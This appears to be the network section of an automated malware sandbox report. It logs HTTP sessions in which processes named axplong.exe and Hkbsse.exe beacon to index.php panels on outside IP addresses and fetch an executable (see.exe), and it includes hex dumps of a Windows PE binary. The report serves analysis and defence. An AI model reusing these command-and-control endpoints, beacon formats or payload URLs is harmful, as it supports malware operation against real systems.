                                                                                                                                                                                                                                        Last-Modified: Sun, 16 Jun 2024 06:41:45 GMT
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        ETag: "666e8929-67c00"
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 29 89 6e 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 ea d7 01 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJr>r>r>=r>;(r>]:r>]=r>];r>:r>?r>r?^r>7r>r><r>Richr>PEL)nf@@,K8l@.text `.rdata:@@.datae 4@.rsrc.@@.relocKL0@B
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:13.152544022 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 30 c1 44 00 e8 4a c5 01 00 59 c3 cc cc cc cc 68 d0 c0 44 00 e8 3a c5 01 00 59
                                                                                                                                                                                                                                        Data Ascii: h0DJYhD:Yj hPE$,FnhDYj htE1FnhDYjhEl2FnhPDYj hE-FonhDYjhE1FOnhDY
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:13.152673960 CEST1236INData Raw: cc cc cc 6a 04 68 64 85 45 00 b9 6c 2f 46 00 e8 4f 6a 01 00 68 10 cf 44 00 e8 99 c0 01 00 59 c3 cc cc cc 6a 04 68 6c 85 45 00 b9 78 34 46 00 e8 2f 6a 01 00 68 70 cf 44 00 e8 79 c0 01 00 59 c3 cc cc cc 6a 04 68 74 85 45 00 b9 ec 30 46 00 e8 0f 6a
                                                                                                                                                                                                                                        Data Ascii: jhdEl/FOjhDYjhlEx4F/jhpDyYjhtE0FjhDYYjh|E85Fih0D9YjhET2FihDYjhE*FihDYjhE*FihPDYjhE.Foi
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:13.152683973 CEST672INData Raw: 68 50 dd 44 00 e8 d9 bb 01 00 59 c3 cc cc cc 6a 08 68 74 87 45 00 b9 fc 2f 46 00 e8 6f 65 01 00 68 b0 dd 44 00 e8 b9 bb 01 00 59 c3 cc cc cc 6a 08 68 80 87 45 00 b9 a4 33 46 00 e8 4f 65 01 00 68 10 de 44 00 e8 99 bb 01 00 59 c3 cc cc cc 6a 10 68
                                                                                                                                                                                                                                        Data Ascii: hPDYjhtE/FoehDYjhE3FOehDYjhE.F/ehpDyYjhE4FehDYYjhE5Fdh0D9YjhE2FdhDYj@hE\-FdhDYjh
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:13.152734041 CEST1236INData Raw: 68 30 e5 44 00 e8 39 b9 01 00 59 c3 cc cc cc 6a 0c 68 74 8a 45 00 b9 5c 33 46 00 e8 cf 62 01 00 68 90 e5 44 00 e8 19 b9 01 00 59 c3 cc cc cc 6a 08 68 84 8a 45 00 b9 04 31 46 00 e8 af 62 01 00 68 f0 e5 44 00 e8 f9 b8 01 00 59 c3 cc cc cc 6a 24 68
                                                                                                                                                                                                                                        Data Ascii: h0D9YjhtE\3FbhDYjhE1FbhDYj$hEl,FbhPDYj$hE/FobhDYj<hE2FObhDYjh Et3F/bhpDyYjh4E,FbhDYYjh@
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:13.152744055 CEST1236INData Raw: 16 00 00 00 5e 5d c3 57 8b 7d 08 85 ff 74 19 81 fe d0 07 00 00 77 11 56 57 51 e8 7c 19 03 00 83 c4 0c 33 c0 5f 5e 5d c3 68 d0 07 00 00 6a 00 51 e8 e6 1e 03 00 83 c4 0c 85 ff 75 19 e8 fd 52 03 00 c7 00 16 00 00 00 e8 39 4a 03 00 5f b8 16 00 00 00
                                                                                                                                                                                                                                        Data Ascii: ^]W}twVWQ|3_^]hjQuR9J_^]vR"J_"^]UE]pFUujujQpQdH]UMEPQu]
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:13.152798891 CEST1236INData Raw: 83 c4 04 55 8b 6b 04 89 6c 24 04 8b ec 6a ff 68 f0 87 44 00 64 a1 00 00 00 00 50 53 83 ec 58 a1 14 20 46 00 33 c5 89 45 ec 56 57 50 8d 45 f4 64 a3 00 00 00 00 8b f9 89 7d e0 8b 43 10 8d 4d c8 50 89 7d e0 e8 3e 52 01 00 8b 43 08 8b 73 0c 89 45 e0
                                                                                                                                                                                                                                        Data Ascii: Ukl$jhDdPSX F3EVWPEd}CMP}>RCsEEMtDU+r AE: ECEfDjhXEEMujguMQPEU}MCUEu+MQR;w%}EECEVE
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:13.152808905 CEST1236INData Raw: cc cc cc 55 8b ec 6a ff 68 58 88 44 00 64 a1 00 00 00 00 50 83 ec 08 a1 14 20 46 00 33 c5 89 45 f0 56 50 8d 45 f4 64 a3 00 00 00 00 8b 75 08 89 75 ec c7 45 fc 00 00 00 00 ff 76 10 8b 46 0c ff d0 56 c7 45 fc 01 00 00 00 e8 20 8c 01 00 6a 14 56 e8
                                                                                                                                                                                                                                        Data Ascii: UjhXDdP F3EVPEduuEvFVE jVMdY^M3]UVjMEWVuFF*@vNFu^]Q(hdEMhEEP
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:13.152817965 CEST1236INData Raw: 50 8d 45 f4 64 a3 00 00 00 00 8b d9 8b 7d 08 8d 73 0c 56 c6 45 e7 00 89 75 e0 e8 2f 96 01 00 83 c4 04 85 c0 0f 85 3a 01 00 00 89 45 fc 8b 43 3c 85 c0 74 51 33 d2 8b 48 04 39 38 74 0a 8b d0 8b c1 85 c0 75 f1 eb 20 85 d2 75 05 89 4b 3c eb 03 89 4a
                                                                                                                                                                                                                                        Data Ascii: PEd}sVEu/:EC<tQ3H98tu uK<JxuS@jP_GHuPE_VEE8E3tw$0@;tlt`Ww4fEV
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:13.152920961 CEST320INData Raw: 74 3c 8b 01 ff 50 08 8b 4e 24 85 c9 74 15 8b 11 3b ce 0f 95 c0 0f b6 c0 50 ff 52 10 c7 46 24 00 00 00 00 6a 28 56 e8 09 a1 01 00 83 c4 08 8b 4d f4 64 89 0d 00 00 00 00 59 5e 8b e5 5d c3 e8 07 8c 01 00 cc cc cc cc cc cc cc cc 56 8b 31 85 f6 74 27
                                                                                                                                                                                                                                        Data Ascii: t<PN$t;PRF$j(VMdY^]V1t'N$t;PRF$j(V^VN$t;PRF$^Ujh7DdP F3ESVWPEdj(}E}
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:13.157643080 CEST1236INData Raw: c0 0f b6 c0 50 ff 52 10 c7 47 24 00 00 00 00 6a 28 57 e8 dd 9f 01 00 83 c4 08 eb 6e 0f 57 c0 66 0f 13 45 e8 e8 42 f6 ff ff 8b 70 04 85 f6 74 07 f0 ff 46 04 8b 70 04 8b 08 89 4d e8 89 75 ec c7 45 fc 03 00 00 00 57 68 00 34 40 00 85 c9 74 06 8b 01
                                                                                                                                                                                                                                        Data Ascii: PRG$j(WnWfEBptFpMuEWh4@tMExE&t!Fu~OuPMdY_^[M3]_Ujh`DdP F3PEdl{MdY]


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        18192.168.2.55898977.91.77.81806360C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:14.329906940 CEST180OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 77.91.77.81
                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 64 31 3d 31 30 30 30 32 32 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                        Data Ascii: d1=1000226001&unit=246122658369
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:15.033849001 CEST193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:14 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        19192.168.2.558990185.216.214.217806360C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:15.096065044 CEST62OUTGET /cdn-directory/see.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: 185.216.214.217


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        20192.168.2.558991185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:16.944289923 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:17.580625057 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:17 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:17.585793972 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:17.778629065 CEST273INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:17 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 35 33 0d 0a 20 3c 63 3e 31 30 30 30 30 35 35 30 30 31 2b 2b 2b 61 36 64 33 39 31 37 62 38 35 30 65 38 61 35 65 34 33 33 30 62 37 63 61 64 66 64 61 61 61 61 61 65 62 32 33 35 30 33 34 32 62 64 35 32 35 30 65 36 65 64 31 64 65 64 36 37 31 31 61 64 64 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 53 <c>1000055001+++a6d3917b850e8a5e4330b7cadfdaaaaaeb2350342bd5250e6ed1ded6711add#<d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        21192.168.2.558993185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:18.808130026 CEST185OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 65 30 3d 31 30 30 30 30 35 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                        Data Ascii: e0=1000055001&unit=246122658369
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:19.453465939 CEST193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:19 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        22192.168.2.558994185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:19.823776007 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:20.442785025 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:20 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:20.443556070 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:20.633829117 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:20 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        23192.168.2.558995185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:20.752532005 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:21.402357101 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:21 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:21.403275967 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:21.804881096 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:21 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:21.811652899 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:21 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        24192.168.2.558996185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:21.923861980 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:22.564585924 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:22 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:22.565331936 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:22.763870001 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:22 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        25192.168.2.558997185.172.128.116807684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:22.877743006 CEST157OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:23.516249895 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:23 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:23.517061949 CEST311OUTPOST /Mb3GvQs8/index.php HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        Host: 185.172.128.116
                                                                                                                                                                                                                                        Content-Length: 156
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 35 34 31 43 43 46 38 31 32 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                                                                                                                                                                                        Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5541CCF812A2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:23.719717979 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:23 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 7 <c><d>0


